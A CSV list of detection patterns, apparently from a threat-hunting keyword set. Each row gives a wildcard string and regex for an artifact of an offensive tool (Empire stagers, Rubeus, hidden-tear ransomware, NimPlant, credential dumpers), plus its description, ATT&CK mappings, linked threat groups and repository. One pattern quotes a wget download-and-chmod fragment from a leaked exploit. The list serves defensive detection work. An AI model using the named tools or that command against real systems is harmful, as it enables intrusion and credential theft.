"*users_list_ridbrute_*",".{0,1000}users_list_ridbrute_.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","1","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","62061"
"*users_no_req_pass.txt*",".{0,1000}users_no_req_pass\.txt.{0,1000}","offensive_tool_keyword","adhunt","Tool for exploiting Active Directory Enviroments - enumeration","T1018 - T1087 - T1087.002 - T1069 - T1069.002","TA0007 - TA0003 - TA0001","N/A","N/A","Discovery","https://github.com/karendm/ADHunt","1","1","N/A","AD Enumeration","7","1","46","10","2023-08-10T18:55:39Z","2023-06-20T13:24:10Z","62062"
"*users_no_req_pass_full.txt*",".{0,1000}users_no_req_pass_full\.txt.{0,1000}","offensive_tool_keyword","adhunt","Tool for exploiting Active Directory Enviroments - enumeration","T1018 - T1087 - T1087.002 - T1069 - T1069.002","TA0007 - TA0003 - TA0001","N/A","N/A","Discovery","https://github.com/karendm/ADHunt","1","1","N/A","AD Enumeration","7","1","46","10","2023-08-10T18:55:39Z","2023-06-20T13:24:10Z","62063"
"*users_only_cracked_through_lm.html*",".{0,1000}users_only_cracked_through_lm\.html.{0,1000}","offensive_tool_keyword","DPAT","Domain Password Audit Tool for Pentesters","T1003 - T1087 - T1110 - T1555","TA0006 - TA0004 - TA0002 - TA0005","N/A","N/A","Credential Access","https://github.com/clr2of8/DPAT","1","0","N/A","N/A","10","10","954","156","2022-06-24T21:41:43Z","2016-11-22T22:00:21Z","62064"
"*Uses eBPF to dump secrets use by PAM (Authentication) module*",".{0,1000}Uses\seBPF\sto\sdump\ssecrets\suse\sby\sPAM\s\(Authentication\)\smodule.{0,1000}","offensive_tool_keyword","pamspy","Credentials Dumper for Linux using eBPF","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/citronneur/pamspy","1","0","#linux","N/A","10","10","1135","63","2024-09-09T13:19:12Z","2022-07-01T19:33:43Z","62066"
"*usestager *backdoor*",".{0,1000}usestager\s.{0,1000}backdoor.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","62067"
"*usestager *ducky*",".{0,1000}usestager\s.{0,1000}ducky.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","62068"
"*usestager *launcher_bat*",".{0,1000}usestager\s.{0,1000}launcher_bat.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","62069"
"*usestager *launcher_lnk*",".{0,1000}usestager\s.{0,1000}launcher_lnk.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","62070"
"*usestager *shellcode*",".{0,1000}usestager\s.{0,1000}shellcode.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","62071"
"*usestager multi/launcher*",".{0,1000}usestager\smulti\/launcher.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","62072"
"*Using a domain DPAPI backup key to triage masterkeys for decryption key mappings*",".{0,1000}Using\sa\sdomain\sDPAPI\sbackup\skey\sto\striage\smasterkeys\sfor\sdecryption\skey\smappings.{0,1000}","offensive_tool_keyword","SharpMapExec","A sharpen version of CrackMapExec","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/cube0x0/SharpMapExec","1","0","#content","N/A","10","7","664","124","2021-11-17T17:53:12Z","2020-12-01T13:03:50Z","62073"
"*using ClickJack.Extensions*",".{0,1000}using\sClickJack\.Extensions.{0,1000}","offensive_tool_keyword","clickjack","automate abuse of clickonce applications","T1210 - T1204 - T1071.001","TA0001 - TA0002 - TA0005","N/A","N/A","Phishing","https://github.com/trustedsec/The_Shelf","1","0","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","62074"
"*using ClickJack.Modules*",".{0,1000}using\sClickJack\.Modules.{0,1000}","offensive_tool_keyword","clickjack","automate abuse of clickonce applications","T1210 - T1204 - T1071.001","TA0001 - TA0002 - TA0005","N/A","N/A","Phishing","https://github.com/trustedsec/The_Shelf","1","0","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","62075"
"*using default value 1208 and flag 1 for w11 and w10*",".{0,1000}using\sdefault\svalue\s1208\sand\sflag\s1\sfor\sw11\sand\sw10.{0,1000}","offensive_tool_keyword","POC","CVE-2024-6768: Improper validation of specified quantity in input produces an unrecoverable state in CLFS.sys causing a BSoD","T1499 - T1485","TA0043 - TA0042 - TA0005","N/A","N/A","Impact","https://github.com/fortra/CVE-2024-6768","1","0","N/A","N/A","10","1","16","4","2024-08-12T20:48:52Z","2024-07-18T07:52:46Z","62076"
"*using donutCS*",".{0,1000}using\sdonutCS.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","N/A","10","10","328","81","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z","62077"
"*using hidden_tear.Tools*",".{0,1000}using\shidden_tear\.Tools.{0,1000}","offensive_tool_keyword","hidden-tear","open source ransomware - many variant in the wild","T1486 - T1059 - T1485 - T1489 - T1070 - T1488","TA0005 - TA0009 - TA0040 - TA0042","N/A","N/A","Ransomware","https://github.com/goliate/hidden-tear","1","0","N/A","N/A","10","8","765","394","2020-07-08T22:34:01Z","2015-08-19T09:06:51Z","62078"
"*using KrbRelayUp.*",".{0,1000}using\sKrbRelayUp\..{0,1000}","offensive_tool_keyword","KrbRelayUp","a universal no-fix local privilege escalation in windows domain environments where LDAP signing is not enforced (the default settings).","T1558 - T1210","TA0004 - TA0003","N/A","Dispossessor - Back Basta","Privilege Escalation","https://github.com/Dec0ne/KrbRelayUp","1","0","N/A","N/A","10","10","1580","209","2022-08-06T12:23:58Z","2022-04-24T21:33:00Z","62079"
"*using MDE_Enum;*",".{0,1000}using\sMDE_Enum\;.{0,1000}","offensive_tool_keyword","MDE_Enum","extract and display detailed information about Windows Defender exclusions and Attack Surface Reduction (ASR) rules","T1070.006","TA0005 - TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/0xsp-SRD/MDE_Enum","1","0","N/A","N/A","8","2","198","18","2024-06-10T18:40:27Z","2024-06-06T15:54:44Z","62080"
"*using module ""Modifiers\FilePathTransformer.psm1""*",".{0,1000}using\smodule\s\""Modifiers\\FilePathTransformer\.psm1\"".{0,1000}","offensive_tool_keyword","Invoke-ArgFuscator","generate obfuscated command-lines for common system-native executables","T1027 - T1059 - T1202","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/wietze/Invoke-ArgFuscator","1","0","#content","N/A","10","2","161","28","2025-04-14T21:24:29Z","2022-11-20T17:59:23Z","62081"
"*using module ""Modifiers\OptionCharSubstitution.psm1""*",".{0,1000}using\smodule\s\""Modifiers\\OptionCharSubstitution\.psm1\"".{0,1000}","offensive_tool_keyword","Invoke-ArgFuscator","generate obfuscated command-lines for common system-native executables","T1027 - T1059 - T1202","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/wietze/Invoke-ArgFuscator","1","0","#content","N/A","10","2","161","28","2025-04-14T21:24:29Z","2022-11-20T17:59:23Z","62082"
"*using module ""Modifiers\QuoteInsertion.psm1""*",".{0,1000}using\smodule\s\""Modifiers\\QuoteInsertion\.psm1\"".{0,1000}","offensive_tool_keyword","Invoke-ArgFuscator","generate obfuscated command-lines for common system-native executables","T1027 - T1059 - T1202","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/wietze/Invoke-ArgFuscator","1","0","#content","N/A","10","2","161","28","2025-04-14T21:24:29Z","2022-11-20T17:59:23Z","62083"
"*using module ""Modifiers\RandomCase.psm1""*",".{0,1000}using\smodule\s\""Modifiers\\RandomCase\.psm1\"".{0,1000}","offensive_tool_keyword","Invoke-ArgFuscator","generate obfuscated command-lines for common system-native executables","T1027 - T1059 - T1202","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/wietze/Invoke-ArgFuscator","1","0","#content","N/A","10","2","161","28","2025-04-14T21:24:29Z","2022-11-20T17:59:23Z","62084"
"*using Moriarty.Msrc;*",".{0,1000}using\sMoriarty\.Msrc\;.{0,1000}","offensive_tool_keyword","Moriarty","Moriarty is designed to enumerate missing KBs -  detect various vulnerabilities and suggest potential exploits for Privilege Escalation in Windows environments.","T1068 - T1083","TA0004 - TA0007","N/A","N/A","Discovery","https://github.com/BC-SECURITY/Moriarty","1","0","N/A","N/A","7","6","510","67","2024-08-07T15:06:31Z","2023-12-11T14:15:33Z","62085"
"*using NixImports*",".{0,1000}using\sNixImports.{0,1000}","offensive_tool_keyword","NixImports","A .NET malware loader using API-Hashing to evade static analysis","T1055.012 - T1562.001 - T1140","TA0005 - TA0003 - TA0040","N/A","N/A","Defense Evasion","https://github.com/dr4k0nia/NixImports","1","0","N/A","N/A","N/A","3","207","23","2023-05-30T14:14:21Z","2023-05-22T18:32:01Z","62086"
"*using Rubeus.Domain;*",".{0,1000}using\sRubeus\.Domain\;.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1482 - T1558.001 - T1558.002 - T1558.003 - T1558.004","TA0006","N/A","Black Basta - Dispossessor - Conti - Diavol - Ryuk - Wizard Spider - APT29 - COZY BEAR","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","10","4409","804","2025-04-17T10:11:57Z","2018-09-23T23:59:03Z","62087"
"*using SharpDecryptPwd*",".{0,1000}using\sSharpDecryptPwd.{0,1000}","offensive_tool_keyword","SharpDecryptPwd","Decrypt Navicat,Xmanager,Filezilla,Foxmail,WinSCP,etc","T1003.008 - T1555.004 - T1552.002","TA0006","N/A","N/A","Credential Access","https://github.com/RowTeam/SharpDecryptPwd","1","0","N/A","N/A","10","8","769","117","2022-03-04T02:49:31Z","2022-02-25T11:21:43Z","62088"
"*using SharpExfiltrate*",".{0,1000}using\sSharpExfiltrate.{0,1000}","offensive_tool_keyword","SharpExfiltrate","Modular C# framework to exfiltrate loot over secure and trusted channels.","T1027 - T1567 - T1561","TA0010 - TA0040 - TA0005","N/A","N/A","Data Exfiltration","https://github.com/Flangvik/SharpExfiltrate","1","0","N/A","N/A","10","2","126","37","2021-09-12T17:08:02Z","2021-09-08T13:17:00Z","62089"
"*using SharpSploit.Credentials*",".{0,1000}using\sSharpSploit\.Credentials.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","0","#content","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","62090"
"*using SharpUp.Classes*",".{0,1000}using\sSharpUp\.Classes.{0,1000}","offensive_tool_keyword","SharpUp","SharpUp is a C# port of various PowerUp functionality. Currently. only the most common checks have been ported. no weaponization functions have yet been implemented.","T1003 - T1082 - T1057 - T1069 - T1083","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/GhostPack/SharpUp","1","0","N/A","N/A","N/A","10","1344","253","2024-02-14T16:38:26Z","2018-07-24T17:39:33Z","62091"
"*using SharpView.Enums*",".{0,1000}using\sSharpView\.Enums.{0,1000}","offensive_tool_keyword","SharpView","C# implementation of harmj0y's PowerView","T1018 - T1482 - T1087.002 - T1069.002","TA0007 - TA0003 - TA0001","N/A","Conti - APT29","Discovery","https://github.com/tevora-threat/SharpView/","1","0","N/A","N/A","10","10","1032","196","2024-03-22T16:34:09Z","2018-07-24T21:15:04Z","62092"
"*using SMBeagle*",".{0,1000}using\sSMBeagle.{0,1000}","offensive_tool_keyword","SMBeagle","SMBeagle is an (SMB) fileshare auditing tool that hunts out all files it can see in the network and reports if the file can be read and/or written. All these findings are streamed out to either a CSV file or an elasticsearch host.","T1087.002 - T1021.002 - T1210","TA0007 - TA0008 - TA0003","N/A","N/A","Discovery","https://github.com/punk-security/SMBeagle","1","0","N/A","N/A","9","8","712","80","2025-01-21T22:34:00Z","2021-05-31T19:46:57Z","62093"
"*using static BackupCreds.Interop*",".{0,1000}using\sstatic\sBackupCreds\.Interop.{0,1000}","offensive_tool_keyword","BackupCreds","A C# implementation of dumping credentials from Windows Credential Manager","T1003 - T1555","TA0006 - TA0005","N/A","Black Basta","Credential Access","https://github.com/leftp/BackupCreds","1","0","N/A","N/A","9","1","57","10","2023-09-23T10:37:05Z","2023-09-23T06:42:20Z","62094"
"*using static SharpUp.Utilities*",".{0,1000}using\sstatic\sSharpUp\.Utilities.{0,1000}","offensive_tool_keyword","SharpUp","SharpUp is a C# port of various PowerUp functionality. Currently. only the most common checks have been ported. no weaponization functions have yet been implemented.","T1003 - T1082 - T1057 - T1069 - T1083","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/GhostPack/SharpUp","1","0","N/A","N/A","N/A","10","1344","253","2024-02-14T16:38:26Z","2018-07-24T17:39:33Z","62095"
"*Using technique (hiding scheduled task) requires NT AUTHORITY*",".{0,1000}Using\stechnique\s\(hiding\sscheduled\stask\)\srequires\sNT\sAUTHORITY.{0,1000}","offensive_tool_keyword","ScheduleRunner","A C# tool with more flexibility to customize scheduled task for both persistence and Lateral Movement in red team operation","T1210 - T1570 - T1021 - T1550","TA0008","N/A","N/A","Persistence","https://github.com/netero1010/ScheduleRunner","1","0","#content","N/A","9","4","336","46","2025-01-22T02:06:59Z","2021-10-12T15:27:32Z","62096"
"*Using VirusToal website as external C2*",".{0,1000}Using\sVirusToal\swebsite\sas\sexternal\sC2.{0,1000}","offensive_tool_keyword","REC2 ","REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/g0h4n/REC2","1","0","N/A","N/A","10","10","153","23","2024-02-22T14:02:24Z","2023-09-25T20:39:59Z","62097"
"*UsoDllLoader*",".{0,1000}UsoDllLoader.{0,1000}","offensive_tool_keyword","UsoDllLoader","This PoC shows a technique that can be used to weaponize privileged file write vulnerabilities on Windows. It provides an alternative to the DiagHub DLL loading exploit ","T1210.001 - T1055 - T1574.001","TA0007 - TA0002 - TA0001","N/A","N/A","Exploitation tool","https://github.com/itm4n/UsoDllLoader","1","1","N/A","N/A","N/A","4","386","100","2020-06-06T11:05:12Z","2019-08-01T17:58:16Z","62098"
"*usr/bin/wget -O /tmp/a http* chmod 755 /tmp/cron*",".{0,1000}usr\/bin\/wget\s\-O\s\/tmp\/a\shttp.{0,1000}\schmod\s755\s\/tmp\/cron.{0,1000}","offensive_tool_keyword","EQGRP tools","Equation Group hack tool leaked by ShadowBrokers- file echowrecker. samba 2.2 and 3.0.2a - 3.0.12-5 RCE (with DWARF symbols)  for FreeBSD  OpenBSD 3.1  OpenBSD 3.2 (with a non-executable stack  zomg)  and Linux. Likely CVE-2003-0201. There is also a Solaris version","T1053 - T1064 - T1059 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tool","https://github.com/x0rz/EQGRP/blob/master/Linux/bin/echowrecker","1","0","#linux","N/A","N/A","10","4124","2071","2017-05-24T21:12:59Z","2017-04-08T14:03:59Z","62099"
"*usr/share/seclists*",".{0,1000}usr\/share\/seclists.{0,1000}","offensive_tool_keyword","wordlists","package contains the rockyou.txt wordlist","T1110.001","TA0006","N/A","N/A","Credential Access","https://www.kali.org/tools/wordlists/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","62100"
"*usr/share/wordlists/rockyou.txt*",".{0,1000}usr\/share\/wordlists\/rockyou\.txt.{0,1000}","offensive_tool_keyword","creddump7","extracts various forms of credentials from Windows systems","T1003 - T1081 - T1040 - T1110 - T1555","TA0006 - TA0009","N/A","Sandworm","Credential Access","https://github.com/CiscoCXSecurity/creddump7","1","0","N/A","N/A","10","4","394","106","2020-10-02T13:25:16Z","2014-06-24T13:18:38Z","62101"
"*usr/src/rusthound rusthound *",".{0,1000}usr\/src\/rusthound\srusthound\s.{0,1000}","offensive_tool_keyword","RustHound","Active Directory data collector for BloodHound written in Rust","T1087.002 - T1018 - T1059.003","TA0007 - TA0001 - TA0002","N/A","N/A","Discovery","https://github.com/OPENCYBER-FR/RustHound","1","0","N/A","AD Enumeration","9","10","1013","98","2024-10-21T18:58:20Z","2022-10-12T05:54:35Z","62102"
"*util.nimplant*",".{0,1000}util\.nimplant.{0,1000}","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","Black Basta","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","N/A","10","10","871","111","2025-03-28T18:53:57Z","2023-02-13T13:42:39Z","62105"
"*util/dot_net_deserialization/*",".{0,1000}util\/dot_net_deserialization\/.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","62106"
"*utils/payloads.db*",".{0,1000}utils\/payloads\.db.{0,1000}","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","N/A","private github repo","10","","N/A","","","","62107"
"*Utils\Posh.cs*",".{0,1000}Utils\\Posh\.cs.{0,1000}","offensive_tool_keyword","Nuages","A modular C2 framework","T1071 - T1090 - T1102 - T1027 - T1571","TA0011 - TA0003 - TA0010","N/A","Dispossessor","C2","https://github.com/p3nt4/Nuages","1","0","N/A","N/A","10","10","455","85","2025-04-10T15:34:19Z","2019-05-12T11:00:35Z","62108"
